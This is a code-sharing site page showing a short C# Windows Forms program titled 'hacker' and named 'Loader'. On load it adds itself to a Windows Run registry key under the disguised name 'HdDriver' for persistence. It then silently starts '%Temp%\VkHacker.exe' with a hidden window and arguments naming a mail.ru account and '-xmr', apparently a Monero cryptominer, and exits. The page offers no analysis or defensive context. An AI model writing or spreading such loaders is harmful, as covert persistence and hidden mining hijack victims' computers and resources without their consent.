Run Code
|
API
|
Code Wall
|
Misc
|
Feedback
|
Login
|
Theme
|
Privacy
|
Patreon
hacker
using System; using System.Windows.Forms; using Microsoft.Win32; using System.IO; using System.Diagnostics; namespace Loader { public partial class Form1 : Form { const string name = "HdDriver"; public bool SetAutorunValue(bool autorun) { string ExePath = System.Windows.Forms.Application.ExecutablePath; RegistryKey reg; reg = Registry.CurrentUser.CreateSubKey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\"); try { if (autorun) reg.SetValue(name, ExePath); else reg.DeleteValue(name); reg.Close(); } catch { return false; } return true; } public Form1() { InitializeComponent(); } private void Form1_Load(object sender, EventArgs e) { SetAutorunValue(true); try { Process _proc = new Process(); _proc.StartInfo.Arguments = "-user super.vitalui@mail.ru -xmr 2"; _proc.StartInfo.CreateNoWindow = true; _proc.StartInfo.UseShellExecute = false; _proc.StartInfo.FileName = @"%Temp%\VkHacker.exe"; _proc.Start(); } catch(Exception ex) { } Application.Exit(); } } }
run
|
edit
|
history
|
help
0
Write a program to count the occurrence of each distinct item in the array?
Hello world
Create URL Safe and Cryptographically Strong Short GUID
Project01
Клас cstatic
W.I.P (c#)
database interior 0.2
Intuit // C# // listing_4.7 (case // calculator)
count number of words in string
occurance of charecter